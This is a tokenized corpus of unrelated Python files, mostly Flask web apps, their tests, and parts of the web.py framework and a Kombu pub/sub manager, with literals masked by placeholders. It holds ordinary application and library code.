<EOL> auth_type , auth_info = header . split ( None , <NUM_LIT:1> ) <EOL> d = parse_dict_header ( auth_info ) <EOL> a1 = '<STR_LIT>' + d [ '<STR_LIT>' ] + '<STR_LIT>' <EOL> ha1 = md5 ( a1 ) . hexdigest ( ) <EOL> a2 = '<STR_LIT>' <EOL> ha2 = md5 ( a2 ) . 
hexdigest ( ) <EOL> a3 = ha1 + '<STR_LIT::>' + d [ '<STR_LIT>' ] + '<STR_LIT::>' + ha2 <EOL> auth_response = md5 ( a3 ) . hexdigest ( ) <EOL> response = self . client . get ( <EOL> '<STR_LIT>' , headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( d [ '<STR_LIT>' ] , <EOL> d [ '<STR_LIT>' ] , <EOL> auth_response , <EOL> d [ '<STR_LIT>' ] ) } ) <EOL> self . assertEqual ( response . data , b'<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import os <EOL> import shutil <EOL> import unittest <EOL> import subprocess <EOL> import shlex <EOL> import sqlite3 <EOL> def run_cmd ( cmd ) : <EOL> """<STR_LIT>""" <EOL> process = subprocess . Popen ( shlex . split ( cmd ) , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> ( stdout , stderr ) = process . communicate ( ) <EOL> return stdout , stderr , process . wait ( ) <EOL> class TestMigrate ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> os . chdir ( os . path . split ( os . path . abspath ( __file__ ) ) [ <NUM_LIT:0> ] ) <EOL> try : <EOL> os . remove ( '<STR_LIT>' ) <EOL> os . remove ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> def tearDown ( self ) : <EOL> try : <EOL> os . remove ( '<STR_LIT>' ) <EOL> os . remove ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> try : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> except OSError : <EOL> pass <EOL> def test_multidb_migrate_upgrade ( self ) : <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> conn1 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn1 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn1 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) , ( '<STR_LIT:user>' , ) ] ) <EOL> conn2 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn2 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn2 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) , ( '<STR_LIT>' , ) ] ) <EOL> from . app_multidb import db , User , Group <EOL> db . session . add ( User ( name = '<STR_LIT:test>' ) ) <EOL> db . session . 
add ( Group ( name = '<STR_LIT>' ) ) <EOL> db . session . commit ( ) <EOL> ( o , e , s ) = run_cmd ( '<STR_LIT>' ) <EOL> self . assertTrue ( s == <NUM_LIT:0> ) <EOL> conn1 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn1 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn1 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) ] ) <EOL> conn2 = sqlite3 . connect ( '<STR_LIT>' ) <EOL> c = conn2 . cursor ( ) <EOL> c . execute ( '<STR_LIT>' ) <EOL> tables = c . fetchall ( ) <EOL> conn2 . close ( ) <EOL> self . assertEqual ( tables , [ ( '<STR_LIT>' , ) ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import six <EOL> from flask import Flask , jsonify , abort , request , make_response , url_for <EOL> from flask . ext . httpauth import HTTPBasicAuth <EOL> app = Flask ( __name__ , static_url_path = "<STR_LIT>" ) <EOL> auth = HTTPBasicAuth ( ) <EOL> @ auth . get_password <EOL> def get_password ( username ) : <EOL> if username == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> return None <EOL> @ auth . error_handler <EOL> def unauthorized ( ) : <EOL> return make_response ( jsonify ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <NUM_LIT> ) <EOL> @ app . errorhandler ( <NUM_LIT> ) <EOL> def bad_request ( error ) : <EOL> return make_response ( jsonify ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <NUM_LIT> ) <EOL> @ app . errorhandler ( <NUM_LIT> ) <EOL> def not_found ( error ) : <EOL> return make_response ( jsonify ( { '<STR_LIT:error>' : '<STR_LIT>' } ) , <NUM_LIT> ) <EOL> tasks = [ <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:1> , <EOL> '<STR_LIT:title>' : u'<STR_LIT>' , <EOL> '<STR_LIT:description>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> { <EOL> '<STR_LIT:id>' : <NUM_LIT:2> , <EOL> '<STR_LIT:title>' : u'<STR_LIT>' , <EOL> '<STR_LIT:description>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } <EOL> ] <EOL> def make_public_task ( task ) : <EOL> new_task = { } <EOL> for field in task : <EOL> if field == '<STR_LIT:id>' : <EOL> new_task [ '<STR_LIT>' ] = url_for ( '<STR_LIT>' , task_id = task [ '<STR_LIT:id>' ] , <EOL> _external = True ) <EOL> else : <EOL> new_task [ field ] = task [ field ] <EOL> return new_task <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ auth . login_required <EOL> def get_tasks ( ) : <EOL> return jsonify ( { '<STR_LIT>' : [ make_public_task ( task ) for task in tasks ] } ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ auth . 
login_required <EOL> def get_task ( task_id ) : <EOL> task = [ task for task in tasks if task [ '<STR_LIT:id>' ] == task_id ] <EOL> if len ( task ) == <NUM_LIT:0> : <EOL> abort ( <NUM_LIT> ) <EOL> return jsonify ( { '<STR_LIT>' : make_public_task ( task [ <NUM_LIT:0> ] ) } ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ auth . login_required <EOL> def create_task ( ) : <EOL> if not request . json or '<STR_LIT:title>' not in request . json : <EOL> abort ( <NUM_LIT> ) <EOL> task = { <EOL> '<STR_LIT:id>' : tasks [ - <NUM_LIT:1> ] [ '<STR_LIT:id>' ] + <NUM_LIT:1> , <EOL> '<STR_LIT:title>' : request . json [ '<STR_LIT:title>' ] , <EOL> '<STR_LIT:description>' : request . json . get ( '<STR_LIT:description>' , "<STR_LIT>" ) , <EOL> '<STR_LIT>' : False <EOL> } <EOL> tasks . append ( task ) <EOL> return jsonify ( { '<STR_LIT>' : make_public_task ( task ) } ) , <NUM_LIT> <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ auth . login_required <EOL> def update_task ( task_id ) : <EOL> task = [ task for task in tasks if task [ '<STR_LIT:id>' ] == task_id ] <EOL> if len ( task ) == <NUM_LIT:0> : <EOL> abort ( <NUM_LIT> ) <EOL> if not request . json : <EOL> abort ( <NUM_LIT> ) <EOL> if '<STR_LIT:title>' in request . json and not isinstance ( request . json [ '<STR_LIT:title>' ] , six . string_types ) : <EOL> abort ( <NUM_LIT> ) <EOL> if '<STR_LIT:description>' in request . json and not isinstance ( request . json [ '<STR_LIT:description>' ] , six . string_types ) : <EOL> abort ( <NUM_LIT> ) <EOL> if '<STR_LIT>' in request . json and type ( request . json [ '<STR_LIT>' ] ) is not bool : <EOL> abort ( <NUM_LIT> ) <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT:title>' ] = request . json . get ( '<STR_LIT:title>' , task [ <NUM_LIT:0> ] [ '<STR_LIT:title>' ] ) <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT:description>' ] = request . json . 
get ( '<STR_LIT:description>' , <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT:description>' ] ) <EOL> task [ <NUM_LIT:0> ] [ '<STR_LIT>' ] = request . json . get ( '<STR_LIT>' , task [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> return jsonify ( { '<STR_LIT>' : make_public_task ( task [ <NUM_LIT:0> ] ) } ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ auth . login_required <EOL> def delete_task ( task_id ) : <EOL> task = [ task for task in tasks if task [ '<STR_LIT:id>' ] == task_id ] <EOL> if len ( task ) == <NUM_LIT:0> : <EOL> abort ( <NUM_LIT> ) <EOL> tasks . remove ( task [ <NUM_LIT:0> ] ) <EOL> return jsonify ( { '<STR_LIT:result>' : True } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( debug = True ) </s>
<s> from flask import request <EOL> from . . models import db , Class , Registration <EOL> from . . decorators import json , collection , etag <EOL> from . import api <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ etag <EOL> @ json <EOL> @ collection ( Class ) <EOL> def get_classes ( ) : <EOL> return Class . query <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ etag <EOL> @ json <EOL> def get_class ( id ) : <EOL> return Class . query . get_or_404 ( id ) <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> @ etag <EOL> @ json <EOL> @ collection ( Registration ) <EOL> def get_class_registrations ( id ) : <EOL> class_ = Class . query . get_or_404 ( id ) <EOL> return class_ . registrations <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ json <EOL> def new_class ( ) : <EOL> class_ = Class ( ) . import_data ( request . get_json ( force = True ) ) <EOL> db . session . add ( class_ ) <EOL> db . session . commit ( ) <EOL> return { } , <NUM_LIT> , { '<STR_LIT>' : class_ . get_url ( ) } <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ json <EOL> def new_class_registration ( id ) : <EOL> class_ = Class . query . get_or_404 ( id ) <EOL> data = request . get_json ( force = True ) <EOL> data [ '<STR_LIT>' ] = class_ . get_url ( ) <EOL> reg = Registration ( ) . import_data ( data ) <EOL> db . session . add ( reg ) <EOL> db . session . commit ( ) <EOL> return { } , <NUM_LIT> , { '<STR_LIT>' : reg . get_url ( ) } <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ json <EOL> def edit_class ( id ) : <EOL> class_ = Class . query . get_or_404 ( id ) <EOL> class_ . import_data ( request . get_json ( force = True ) ) <EOL> db . session . add ( class_ ) <EOL> db . session . commit ( ) <EOL> return { } <EOL> @ api . route ( '<STR_LIT>' , methods = [ '<STR_LIT>' ] ) <EOL> @ json <EOL> def delete_class ( id ) : <EOL> class_ = Class . 
query . get_or_404 ( id ) <EOL> db . session . delete ( class_ ) <EOL> db . session . commit ( ) <EOL> return { } </s>
<s> from flask import render_template , current_app , request , redirect , url_for , flash <EOL> from flask . ext . login import login_user , logout_user , login_required <EOL> from . . models import User <EOL> from . import auth <EOL> from . forms import LoginForm <EOL> @ auth . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def login ( ) : <EOL> if not current_app . config [ '<STR_LIT>' ] and not current_app . config [ '<STR_LIT>' ] and not request . is_secure : <EOL> return redirect ( url_for ( '<STR_LIT>' , _external = True , _scheme = '<STR_LIT>' ) ) <EOL> form = LoginForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> user = User . query . filter_by ( email = form . email . data ) . first ( ) <EOL> if user is None or not user . verify_password ( form . password . data ) : <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) <EOL> login_user ( user , form . remember_me . data ) <EOL> return redirect ( request . args . get ( '<STR_LIT>' ) or url_for ( '<STR_LIT>' ) ) <EOL> return render_template ( '<STR_LIT>' , form = form ) <EOL> @ auth . route ( '<STR_LIT>' ) <EOL> @ login_required <EOL> def logout ( ) : <EOL> logout_user ( ) <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT>' ) ) </s>
<s> import os <EOL> COV = None <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> import coverage <EOL> COV = coverage . coverage ( branch = True , include = '<STR_LIT>' ) <EOL> COV . start ( ) <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' ) <EOL> for line in open ( '<STR_LIT>' ) : <EOL> var = line . strip ( ) . split ( '<STR_LIT:=>' ) <EOL> if len ( var ) == <NUM_LIT:2> : <EOL> os . environ [ var [ <NUM_LIT:0> ] ] = var [ <NUM_LIT:1> ] <EOL> from app import create_app , db <EOL> from app . models import User , Follow , Role , Permission , Post , Comment <EOL> from flask . ext . script import Manager , Shell <EOL> from flask . ext . migrate import Migrate , MigrateCommand <EOL> app = create_app ( os . getenv ( '<STR_LIT>' ) or '<STR_LIT:default>' ) <EOL> manager = Manager ( app ) <EOL> migrate = Migrate ( app , db ) <EOL> def make_shell_context ( ) : <EOL> return dict ( app = app , db = db , User = User , Follow = Follow , Role = Role , <EOL> Permission = Permission , Post = Post , Comment = Comment ) <EOL> manager . add_command ( "<STR_LIT>" , Shell ( make_context = make_shell_context ) ) <EOL> manager . add_command ( '<STR_LIT>' , MigrateCommand ) <EOL> @ manager . command <EOL> def test ( coverage = False ) : <EOL> """<STR_LIT>""" <EOL> if coverage and not os . environ . get ( '<STR_LIT>' ) : <EOL> import sys <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:1>' <EOL> os . execvp ( sys . executable , [ sys . executable ] + sys . argv ) <EOL> import unittest <EOL> tests = unittest . TestLoader ( ) . discover ( '<STR_LIT>' ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( tests ) <EOL> if COV : <EOL> COV . stop ( ) <EOL> COV . save ( ) <EOL> print ( '<STR_LIT>' ) <EOL> COV . report ( ) <EOL> basedir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> covdir = os . path . join ( basedir , '<STR_LIT>' ) <EOL> COV . html_report ( directory = covdir ) <EOL> print ( '<STR_LIT>' % covdir ) <EOL> COV . 
erase ( ) <EOL> @ manager . command <EOL> def profile ( length = <NUM_LIT> , profile_dir = None ) : <EOL> """<STR_LIT>""" <EOL> from werkzeug . contrib . profiler import ProfilerMiddleware <EOL> app . wsgi_app = ProfilerMiddleware ( app . wsgi_app , restrictions = [ length ] , <EOL> profile_dir = profile_dir ) <EOL> app . run ( ) <EOL> @ manager . command <EOL> def deploy ( ) : <EOL> """<STR_LIT>""" <EOL> from flask . ext . migrate import upgrade <EOL> from app . models import Role , User <EOL> upgrade ( ) <EOL> Role . insert_roles ( ) <EOL> User . add_self_follows ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> manager . run ( ) </s>
<s> import os <EOL> import sys <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> pybabel = '<STR_LIT>' <EOL> else : <EOL> pybabel = '<STR_LIT>' <EOL> os . system ( pybabel + '<STR_LIT>' ) <EOL> os . system ( pybabel + '<STR_LIT>' ) <EOL> os . unlink ( '<STR_LIT>' ) </s>
<s> from flask import Flask , render_template <EOL> app = Flask ( __name__ ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def user ( name ) : <EOL> return render_template ( '<STR_LIT>' , name = name ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( debug = True ) </s>
<s> import os <EOL> from flask import Flask <EOL> from flask . ext . bootstrap import Bootstrap <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> from flask . ext . login import LoginManager <EOL> bootstrap = Bootstrap ( ) <EOL> db = SQLAlchemy ( ) <EOL> lm = LoginManager ( ) <EOL> lm . login_view = '<STR_LIT>' <EOL> def create_app ( config_name ) : <EOL> """<STR_LIT>""" <EOL> app = Flask ( __name__ ) <EOL> cfg = os . path . join ( os . getcwd ( ) , '<STR_LIT>' , config_name + '<STR_LIT>' ) <EOL> app . config . from_pyfile ( cfg ) <EOL> bootstrap . init_app ( app ) <EOL> db . init_app ( app ) <EOL> lm . init_app ( app ) <EOL> from . main import main as main_blueprint <EOL> app . register_blueprint ( main_blueprint ) <EOL> if not app . config [ '<STR_LIT>' ] and not app . config [ '<STR_LIT>' ] : <EOL> import logging <EOL> from logging . handlers import SMTPHandler <EOL> mail_handler = SMTPHandler ( '<STR_LIT:127.0.0.1>' , '<STR_LIT>' , <EOL> app . config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> mail_handler . setLevel ( logging . ERROR ) <EOL> app . logger . addHandler ( mail_handler ) <EOL> return app </s>
<s> import pickle <EOL> import uuid <EOL> try : <EOL> import kombu <EOL> except ImportError : <EOL> kombu = None <EOL> from . pubsub_manager import PubSubManager <EOL> class KombuManager ( PubSubManager ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self , url = '<STR_LIT>' , <EOL> channel = '<STR_LIT>' , write_only = False ) : <EOL> if kombu is None : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> super ( KombuManager , self ) . __init__ ( channel = channel ) <EOL> self . url = url <EOL> self . writer_conn = kombu . Connection ( self . url ) <EOL> self . writer_queue = self . _queue ( self . writer_conn ) <EOL> def _queue ( self , conn = None ) : <EOL> exchange = kombu . Exchange ( self . channel , type = '<STR_LIT>' , durable = False ) <EOL> queue = kombu . Queue ( str ( uuid . uuid4 ( ) ) , exchange ) <EOL> return queue <EOL> def _publish ( self , data ) : <EOL> with self . writer_conn . SimpleQueue ( self . writer_queue ) as queue : <EOL> queue . put ( pickle . dumps ( data ) ) <EOL> def _listen ( self ) : <EOL> reader_conn = kombu . Connection ( self . url ) <EOL> reader_queue = self . _queue ( reader_conn ) <EOL> with reader_conn . SimpleQueue ( reader_queue ) as queue : <EOL> while True : <EOL> message = queue . get ( block = True ) <EOL> message . ack ( ) <EOL> yield message . payload </s>
<s> import md5 <EOL> import os <EOL> import tempfile <EOL> import cPickle <EOL> class FileCacheError ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> class FileCache ( object ) : <EOL> DEPTH = <NUM_LIT:3> <EOL> def __init__ ( self , root_directory = None ) : <EOL> self . _InitializeRootDirectory ( root_directory ) <EOL> def Get ( self , key ) : <EOL> path = self . _GetPath ( key ) <EOL> if os . path . exists ( path ) : <EOL> return cPickle . load ( open ( path ) ) <EOL> else : <EOL> return None <EOL> def Set ( self , key , data ) : <EOL> path = self . _GetPath ( key ) <EOL> directory = os . path . dirname ( path ) <EOL> if not os . path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> if not os . path . isdir ( directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % directory ) <EOL> temp_fd , temp_path = tempfile . mkstemp ( ) <EOL> temp_fp = os . fdopen ( temp_fd , '<STR_LIT:w>' ) <EOL> cPickle . dump ( data , temp_fp ) <EOL> temp_fp . close ( ) <EOL> if not path . startswith ( self . _root_directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % <EOL> ( path , self . _root_directory ) ) <EOL> if os . path . exists ( path ) : <EOL> os . remove ( path ) <EOL> os . rename ( temp_path , path ) <EOL> def Remove ( self , key ) : <EOL> path = self . _GetPath ( key ) <EOL> if not path . startswith ( self . _root_directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % <EOL> ( path , self . _root_directory ) ) <EOL> if os . path . exists ( path ) : <EOL> os . remove ( path ) <EOL> def GetCachedTime ( self , key ) : <EOL> path = self . _GetPath ( key ) <EOL> if os . path . exists ( path ) : <EOL> return os . path . getmtime ( path ) <EOL> else : <EOL> return None <EOL> def _GetUsername ( self ) : <EOL> '''<STR_LIT>''' <EOL> return os . getenv ( '<STR_LIT>' ) or os . getenv ( '<STR_LIT>' ) or os . getenv ( '<STR_LIT>' ) or os . getlogin ( ) or '<STR_LIT>' <EOL> def _GetTmpCachePath ( self ) : <EOL> username = self . 
_GetUsername ( ) <EOL> cache_directory = '<STR_LIT>' + username <EOL> return os . path . join ( tempfile . gettempdir ( ) , cache_directory ) <EOL> def _InitializeRootDirectory ( self , root_directory ) : <EOL> if not root_directory : <EOL> root_directory = self . _GetTmpCachePath ( ) <EOL> root_directory = os . path . abspath ( root_directory ) <EOL> if not os . path . exists ( root_directory ) : <EOL> os . mkdir ( root_directory ) <EOL> if not os . path . isdir ( root_directory ) : <EOL> raise FileCacheError ( '<STR_LIT>' % <EOL> root_directory ) <EOL> self . _root_directory = root_directory <EOL> def _GetPath ( self , key ) : <EOL> hashed_key = md5 . new ( key ) . hexdigest ( ) <EOL> return os . path . join ( self . _root_directory , <EOL> self . _GetPrefix ( hashed_key ) , <EOL> hashed_key ) <EOL> def _GetPrefix ( self , hashed_key ) : <EOL> return os . path . sep . join ( hashed_key [ <NUM_LIT:0> : FileCache . DEPTH ] ) </s>
<s> """<STR_LIT>""" <EOL> import webapi as web <EOL> import webapi , wsgi , utils <EOL> import debugerror <EOL> import httpserver <EOL> from utils import lstrips , safeunicode <EOL> import sys <EOL> import urllib <EOL> import traceback <EOL> import itertools <EOL> import os <EOL> import types <EOL> from exceptions import SystemExit <EOL> try : <EOL> import wsgiref . handlers <EOL> except ImportError : <EOL> pass <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class application : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , mapping = ( ) , fvars = { } , autoreload = None ) : <EOL> if autoreload is None : <EOL> autoreload = web . config . get ( '<STR_LIT>' , False ) <EOL> self . init_mapping ( mapping ) <EOL> self . fvars = fvars <EOL> self . processors = [ ] <EOL> self . add_processor ( loadhook ( self . _load ) ) <EOL> self . add_processor ( unloadhook ( self . _unload ) ) <EOL> if autoreload : <EOL> def main_module_name ( ) : <EOL> mod = sys . modules [ '<STR_LIT:__main__>' ] <EOL> file = getattr ( mod , '<STR_LIT>' , None ) <EOL> return file and os . path . splitext ( os . path . basename ( file ) ) [ <NUM_LIT:0> ] <EOL> def modname ( fvars ) : <EOL> """<STR_LIT>""" <EOL> file , name = fvars . get ( '<STR_LIT>' ) , fvars . get ( '<STR_LIT>' ) <EOL> if file is None or name is None : <EOL> return None <EOL> if name == '<STR_LIT:__main__>' : <EOL> name = main_module_name ( ) <EOL> return name <EOL> mapping_name = utils . dictfind ( fvars , mapping ) <EOL> module_name = modname ( fvars ) <EOL> def reload_mapping ( ) : <EOL> """<STR_LIT>""" <EOL> mod = __import__ ( module_name , None , None , [ '<STR_LIT>' ] ) <EOL> mapping = getattr ( mod , mapping_name , None ) <EOL> if mapping : <EOL> self . fvars = mod . __dict__ <EOL> self . init_mapping ( mapping ) <EOL> self . 
add_processor ( loadhook ( Reloader ( ) ) ) <EOL> if mapping_name and module_name : <EOL> self . add_processor ( loadhook ( reload_mapping ) ) <EOL> if main_module_name ( ) and '<STR_LIT:__main__>' in sys . argv : <EOL> try : <EOL> __import__ ( main_module_name ( ) ) <EOL> except ImportError : <EOL> pass <EOL> def _load ( self ) : <EOL> web . ctx . app_stack . append ( self ) <EOL> def _unload ( self ) : <EOL> web . ctx . app_stack = web . ctx . app_stack [ : - <NUM_LIT:1> ] <EOL> if web . ctx . app_stack : <EOL> oldctx = web . ctx . get ( '<STR_LIT>' ) <EOL> if oldctx : <EOL> web . ctx . home = oldctx . home <EOL> web . ctx . homepath = oldctx . homepath <EOL> web . ctx . path = oldctx . path <EOL> web . ctx . fullpath = oldctx . fullpath <EOL> def _cleanup ( self ) : <EOL> utils . ThreadedDict . clear_all ( ) <EOL> def init_mapping ( self , mapping ) : <EOL> self . mapping = list ( utils . group ( mapping , <NUM_LIT:2> ) ) <EOL> def add_mapping ( self , pattern , classname ) : <EOL> self . mapping . append ( ( pattern , classname ) ) <EOL> def add_processor ( self , processor ) : <EOL> """<STR_LIT>""" <EOL> self . processors . append ( processor ) <EOL> def request ( self , localpart = '<STR_LIT:/>' , method = '<STR_LIT:GET>' , data = None , <EOL> host = "<STR_LIT>" , headers = None , https = False , ** kw ) : <EOL> """<STR_LIT>""" <EOL> path , maybe_query = urllib . splitquery ( localpart ) <EOL> query = maybe_query or "<STR_LIT>" <EOL> if '<STR_LIT>' in kw : <EOL> env = kw [ '<STR_LIT>' ] <EOL> else : <EOL> env = { } <EOL> env = dict ( env , HTTP_HOST = host , REQUEST_METHOD = method , PATH_INFO = path , QUERY_STRING = query , HTTPS = str ( https ) ) <EOL> headers = headers or { } <EOL> for k , v in headers . items ( ) : <EOL> env [ '<STR_LIT>' + k . upper ( ) . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) ] = v <EOL> if '<STR_LIT>' in env : <EOL> env [ '<STR_LIT>' ] = env . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in env : <EOL> env [ '<STR_LIT>' ] = env . 
pop ( '<STR_LIT>' ) <EOL> if method not in [ "<STR_LIT>" , "<STR_LIT:GET>" ] : <EOL> data = data or '<STR_LIT>' <EOL> import StringIO <EOL> if isinstance ( data , dict ) : <EOL> q = urllib . urlencode ( data ) <EOL> else : <EOL> q = data <EOL> env [ '<STR_LIT>' ] = StringIO . StringIO ( q ) <EOL> if not env . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) . startswith ( '<STR_LIT>' ) and '<STR_LIT>' not in env : <EOL> env [ '<STR_LIT>' ] = len ( q ) <EOL> response = web . storage ( ) <EOL> def start_response ( status , headers ) : <EOL> response . status = status <EOL> response . headers = dict ( headers ) <EOL> response . header_items = headers <EOL> response . data = "<STR_LIT>" . join ( self . wsgifunc ( ) ( env , start_response ) ) <EOL> return response <EOL> def browser ( self ) : <EOL> import browser <EOL> return browser . AppBrowser ( self ) <EOL> def handle ( self ) : <EOL> fn , args = self . _match ( self . mapping , web . ctx . path ) <EOL> return self . _delegate ( fn , self . fvars , args ) <EOL> def handle_with_processors ( self ) : <EOL> def process ( processors ) : <EOL> try : <EOL> if processors : <EOL> p , processors = processors [ <NUM_LIT:0> ] , processors [ <NUM_LIT:1> : ] <EOL> return p ( lambda : process ( processors ) ) <EOL> else : <EOL> return self . handle ( ) <EOL> except web . HTTPError : <EOL> raise <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> print >> web . debug , traceback . format_exc ( ) <EOL> raise self . internalerror ( ) <EOL> return process ( self . processors ) <EOL> def wsgifunc ( self , * middleware ) : <EOL> """<STR_LIT>""" <EOL> def peep ( iterator ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstchunk = iterator . next ( ) <EOL> except StopIteration : <EOL> firstchunk = '<STR_LIT>' <EOL> return itertools . chain ( [ firstchunk ] , iterator ) <EOL> def is_generator ( x ) : return x and hasattr ( x , '<STR_LIT>' ) <EOL> def wsgi ( env , start_resp ) : <EOL> self . 
_cleanup ( ) <EOL> self . load ( env ) <EOL> try : <EOL> if web . ctx . method . upper ( ) != web . ctx . method : <EOL> raise web . nomethod ( ) <EOL> result = self . handle_with_processors ( ) <EOL> if is_generator ( result ) : <EOL> result = peep ( result ) <EOL> else : <EOL> result = [ result ] <EOL> except web . HTTPError , e : <EOL> result = [ e . data ] <EOL> result = web . safestr ( iter ( result ) ) <EOL> status , headers = web . ctx . status , web . ctx . headers <EOL> start_resp ( status , headers ) <EOL> def cleanup ( ) : <EOL> self . _cleanup ( ) <EOL> yield '<STR_LIT>' <EOL> return itertools . chain ( result , cleanup ( ) ) <EOL> for m in middleware : <EOL> wsgi = m ( wsgi ) <EOL> return wsgi <EOL> def run ( self , * middleware ) : <EOL> """<STR_LIT>""" <EOL> return wsgi . runwsgi ( self . wsgifunc ( * middleware ) ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> if httpserver . server : <EOL> httpserver . server . stop ( ) <EOL> httpserver . server = None <EOL> def cgirun ( self , * middleware ) : <EOL> """<STR_LIT>""" <EOL> wsgiapp = self . wsgifunc ( * middleware ) <EOL> try : <EOL> from google . appengine . ext . webapp . util import run_wsgi_app <EOL> return run_wsgi_app ( wsgiapp ) <EOL> except ImportError : <EOL> return wsgiref . handlers . CGIHandler ( ) . run ( wsgiapp ) <EOL> def load ( self , env ) : <EOL> """<STR_LIT>""" <EOL> ctx = web . ctx <EOL> ctx . clear ( ) <EOL> ctx . status = '<STR_LIT>' <EOL> ctx . headers = [ ] <EOL> ctx . output = '<STR_LIT>' <EOL> ctx . environ = ctx . env = env <EOL> ctx . host = env . get ( '<STR_LIT>' ) <EOL> if env . get ( '<STR_LIT>' ) in [ '<STR_LIT:http>' , '<STR_LIT>' ] : <EOL> ctx . protocol = env [ '<STR_LIT>' ] <EOL> elif env . get ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) in [ '<STR_LIT>' , '<STR_LIT:true>' , 